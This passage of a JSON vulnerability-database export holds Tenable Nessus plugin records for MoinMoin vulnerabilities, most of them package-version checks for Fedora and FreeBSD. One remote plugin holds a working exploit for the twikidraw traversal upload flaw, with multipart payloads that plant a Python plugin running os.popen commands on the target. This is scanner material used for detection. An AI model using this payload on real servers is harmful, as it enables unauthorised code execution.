audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"moin-1.9.6-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moin\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:48", "description": "Update to 1.9.6. Fixes CVE-2012-6495 \n\nFor full changes, see :\n\nhttp://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "published": "2013-01-23T00:00:00", "title": "Fedora 17 : moin-1.9.6-1.fc17 (2013-0685)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-01-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:moin"], "id": "FEDORA_2013-0685.NASL", "href": "https://www.tenable.com/plugins/nessus/63656", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0685.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63656);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\");\n script_bugtraq_id(57076, 57082);\n script_xref(name:\"FEDORA\", value:\"2013-0685\");\n\n script_name(english:\"Fedora 17 : moin-1.9.6-1.fc17 (2013-0685)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.9.6. Fixes CVE-2012-6495 \n\nFor full changes, see :\n\nhttp://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890904\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097329.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64121c64\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected moin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"moin-1.9.6-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moin\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:48", "description": "Update to 1.9.6. Fixes CVE-2012-6495 \n\nFor full changes, see :\n\nhttp://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "published": "2013-01-23T00:00:00", "title": "Fedora 16 : moin-1.9.6-1.fc16 (2013-0640)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-01-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moin", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-0640.NASL", "href": "https://www.tenable.com/plugins/nessus/63655", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0640.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63655);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\");\n script_bugtraq_id(57076, 57082);\n script_xref(name:\"FEDORA\", value:\"2013-0640\");\n\n script_name(english:\"Fedora 16 : moin-1.9.6-1.fc16 (2013-0640)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.9.6. Fixes CVE-2012-6495 \n\nFor full changes, see :\n\nhttp://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890904\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097263.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a608fbd6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected moin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"moin-1.9.6-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moin\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the twikidraw (action/twikidraw.py)\naction. A remote, unauthenticated attacker could utilize a specially\ncrafted request using directory traversal style characters to upload a\nfile containing arbitrary code to the remote host. An attacker could\nthen execute the code with the privileges of the user that runs the\nMoinMoin process. Successful exploitation requires that the MoinMoin\nplugin directory has write permission set for the MoinMoin server user. \n\nNote that the 'anywikidraw' action is reportedly also affected by the\ndirectory traversal and code execution vulnerabilities. The application\nis also reportedly affected by an additional directory traversal\nvulnerability in the action/AttachFile.py script (CVE-2012-6080) as well\nas a cross-site scripting (XSS) vulnerability when creating an rss link\n(CVE-2012-6082). Nessus has not, however, tested for these additional\nissues.", "edition": 27, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-01-21T00:00:00", "title": "MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-01-21T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_TWIKIDRAW_CODE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/63638", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63638);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6081\", \"CVE-2012-6495\");\n script_bugtraq_id(57082, 57147);\n script_xref(name:\"EDB-ID\", value:\"25304\");\n\n script_name(english:\"MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite\");\n script_summary(english:\"Attempts to execute arbitrary code\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server is affected by a code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the twikidraw (action/twikidraw.py)\naction. A remote, unauthenticated attacker could utilize a specially\ncrafted request using directory traversal style characters to upload a\nfile containing arbitrary code to the remote host. An attacker could\nthen execute the code with the privileges of the user that runs the\nMoinMoin process. Successful exploitation requires that the MoinMoin\nplugin directory has write permission set for the MoinMoin server user. \n\nNote that the 'anywikidraw' action is reportedly also affected by the\ndirectory traversal and code execution vulnerabilities. The application\nis also reportedly affected by an additional directory traversal\nvulnerability in the action/AttachFile.py script (CVE-2012-6080) as well\nas a cross-site scripting (XSS) vulnerability when creating an rss link\n(CVE-2012-6082). Nessus has not, however, tested for these additional\nissues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes/CVE-2012-6081\");\n # http://www.h-online.com/security/news/item/Hackers-gain-access-to-all-edu-domains-1858471.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f8ddc57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-6495\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_require_keys(\"www/moinmoin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\n\n# Check permissions on WikiSandBox page\nres = http_send_recv3(\n method : \"GET\",\n item : dir + \"/WikiSandBox\",\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\"Edit (Text)\" >!< res[2] || \"Edit (GUI)\" >!< res[2])\n exit(0, \"Authentication is required to test the\" + \"MoinMoin install at \" + install_url + \".\");\n\n# Grab a ticket hash needed for the exploit\nurl = \"/WikiSandBox?action=twikidraw&do=modify&target=../../../../data/plugin/action/nessus.py\";\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + url,\n port : port,\n exit_on_fail : TRUE\n);\n\n# Versions 1.9.x < 1.9.2 do not use a ticket hash\n# Versions 1.9.2 and up do require this value\npat = \"&ticket=(.+)&\";\nmatch = eregmatch(pattern:pat, string:res[2]);\nif (!isnull(match)) ticket = match[1];\nelse ticket = \"\";\n\n# Check for escaping in versions >= 1.9.6 which indicate a non-affected instance\npat2 = 'param name=\"basename\" value=\"(.._)+';\nmatch2 = eregmatch(pattern:pat2, string:res[2]);\nif (!isnull(match2))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n\n# variables for our loop\nvuln = FALSE;\nvuln2 = FALSE;\n\nforeach cmd (cmds)\n{\n script = (SCRIPT_NAME - \".nasl\");\n script = str_replace(string:script, find:\"_\", replace:\"\");\n exp_script = script + unixtime() + \".py\";\n\n # Define our exploits\n # Unix exploit\n unix_exploit = '--89692781418184\\nContent-Disposition: form-data;' +\n ' name=\"filename\"\\n\\ndrawing.r if()else[]\\nimport os\\ndef execute(p,r):' +\n 'exec\"print>>r,os\\\\56popen(' + \"'\" + cmd + \"&&pwd'\" + \")\\56read()\" +\n '\"\\n--89692781418184\\nContent-Disposition: form-data; name=\"filepath\"; ' +\n 'filename=\"drawing.png\"\\nContent-Type: image/png\\n\\nMoinMoin error' +\n '\\n\\n--89692781418184--';\n\n # Windows exploit\n win_exploit = '--89692781418184\\nContent-Disposition: form-data; ' +\n 'name=\"filename\"\\n\\n\"\\n--89692781418184\\nContent-Disposition: form-data;' +\n ' name=\"filepath\"; filename=\"drawing.png\"\\nContent-Type: image/png\\n\\n' +\n 'MoinMoin error\\ndrawing.r if()else[]\\nimport os\\ndef execute(p,r):exec\"' +\n 'print>>r,os\\\\56popen(' + \"'\" + cmd + \"&& dir'\" + \")\\56read()\" +\n '\"\\n\\n--89692781418184--';\n\n if (cmd == 'id') exploit = unix_exploit;\n else exploit = win_exploit;\n\n # Upload our file\n url = \"?action=twikidraw&do=save&ticket=\" + ticket +\n \"&target=../../../../data/plugin/action/\" + exp_script;\n\n res = http_send_recv3(\n method : \"POST\",\n item : dir + \"/WikiSandBox\" + url,\n add_headers : make_array(\"Content-Type\",\n \"multipart/form-data; boundary=89692781418184\"),\n data : exploit,\n port : port,\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n upload = res[2];\n\n # Test code execution with our uploaded file\n check_url = \"/WikiSandBox?action=\" + (exp_script - \".py\");\n res = http_send_recv3(\n method : \"GET\",\n item : dir + check_url,\n port : port,\n exit_on_fail : TRUE\n );\n\n # Extract path for reporting. /data/plugin/action is where upload will reside\n if (cmd == 'id')\n {\n get_path = strstr(res[2], \"/\");\n get_up_path = chomp(get_path) + \"/data/plugin/action/\" + script + \"*\";\n\n output = strstr(res[2], \"uid\") - get_path;\n }\n else\n {\n get_path = strstr(res[2], \"Volume in drive\");\n get_dir = egrep(pattern:\"Directory of (.+)\", string:get_path);\n get_up_path = chomp((get_dir - \" Directory of \")) + \"\\data\\plugin\\action\\\"+\n script + \"*\";\n\n output = strstr(res[2], \"Windows IP\") - get_path;\n }\n\n match = egrep(pattern:cmd_pats[cmd], string:res[2]);\n\n\n # For CGI installs, plugins are activated on the next request\n if (match)\n {\n vuln = TRUE;\n break;\n }\n # For the standalone or twisted servers, plugins are activated after\n # restarting the MoinMoin server.\n # For FastCGI and mod_python, Apache needs a restart for exploit to work.\n else if (\n (isnull(upload)) &&\n (!vuln) &&\n (\"<h1>Unhandled Exception</h1>\" >!< res[2])\n )\n {\n vuln2 = TRUE;\n break;\n }\n}\n\n# Exit if upload and/or attack fail\nif ((!vuln) && (!vuln2))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n\n# Reporting\nif (report_verbosity > 0)\n{\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n # Reporting for successful exploit\n if (vuln)\n {\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + install_url + check_url +\n '\\n' +\n '\\nNote: This file has not been removed by Nessus and will need to be' +\n '\\nmanually deleted (' + get_up_path + ').' +\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\nThis file was uploaded using the following request :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + exp_request +\n '\\n' + snip +\n '\\n' +\n '\\n' + 'The file uploaded by Nessus executed the command \"'+cmd+ '\"' +\n '\\nwhich produced the following output :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n }\n # Reporting for successful upload, but attack would require a server restart\n # in order for plugin to be activated\n else if (vuln2)\n {\n report =\n '\\nNessus was able to upload a file to the remote host, however cannot' +\n '\\nverify the issue exists until the web server has been restarted.' +\n '\\nTo test the issue after restarting your webserver, you can use the' +\n '\\nfollowing URL to verify the exploit :' +\n '\\n' +\n '\\n' + install_url + check_url +\n '\\n' +\n '\\nNote that this file has not been removed by Nessus and will need to' +\n '\\nbe manually deleted (/data/plugin/action/' + script + '*).' +\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\nThis file was uploaded using the following request :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + data_protection::sanitize_uid(output:exp_request) +\n '\\n' + snip +\n '\\n';\n }\n }\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:48:42", "description": "MoinMoin developers report the following vulnerabilities as fixed in\nversion 1.9.6 :\n\n- remote code execution vulnerability in twikidraw/anywikidraw action,\n\n- path traversal vulnerability in AttachFile action,\n\n- XSS issue, escape page name in rss link.\n\nCVE entries at MITRE furher clarify :\n\nMultiple unrestricted file upload vulnerabilities in the (1) twikidraw\n(action/twikidraw.py) and (2) anywikidraw (action/anywikidraw.py)\nactions in MoinMoin before 1.9.6 allow remote authenticated users with\nwrite permissions to execute arbitrary code by uploading a file with\nan executable extension, then accessing it via a direct request to the\nfile in an unspecified directory, as exploited in the wild in July\n2012.\n\nDirectory traversal vulnerability in the _do_attachment_move function\nin the AttachFile action (action/AttachFile.py) in MoinMoin 1.9.3\nthrough 1.9.5 allows remote attackers to overwrite arbitrary files via\na .. (dot dot) in a file name.\n\nCross-site scripting (XSS) vulnerability in the rsslink function in\ntheme/__init__.py in MoinMoin 1.9.5 allows remote attackers to inject\narbitrary web script or HTML via the page name in a rss link.", "edition": 24, "published": "2013-01-07T00:00:00", "title": "FreeBSD : moinmoin -- Multiple vulnerabilities (a264b1b0-5726-11e2-9483-14dae938ec40)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-01-07T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:moinmoin"], "id": "FREEBSD_PKG_A264B1B0572611E2948314DAE938EC40.NASL", "href": "https://www.tenable.com/plugins/nessus/63397", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63397);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\");\n script_xref(name:\"DSA\", value:\"2593\");\n\n script_name(english:\"FreeBSD : moinmoin -- Multiple vulnerabilities (a264b1b0-5726-11e2-9483-14dae938ec40)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MoinMoin developers report the following vulnerabilities as fixed in\nversion 1.9.6 :\n\n- remote code execution vulnerability in twikidraw/anywikidraw action,\n\n- path traversal vulnerability in AttachFile action,\n\n- XSS issue, escape page name in rss link.\n\nCVE entries at MITRE furher clarify :\n\nMultiple unrestricted file upload vulnerabilities in the (1) twikidraw\n(action/twikidraw.py) and (2) anywikidraw (action/anywikidraw.py)\nactions in MoinMoin before 1.9.6 allow remote authenticated users with\nwrite permissions to execute arbitrary code by uploading a file with\nan executable extension, then accessing it via a direct request to the\nfile in an unspecified directory, as exploited in the wild in July\n2012.\n\nDirectory traversal vulnerability in the _do_attachment_move function\nin the AttachFile action (action/AttachFile.py) in MoinMoin 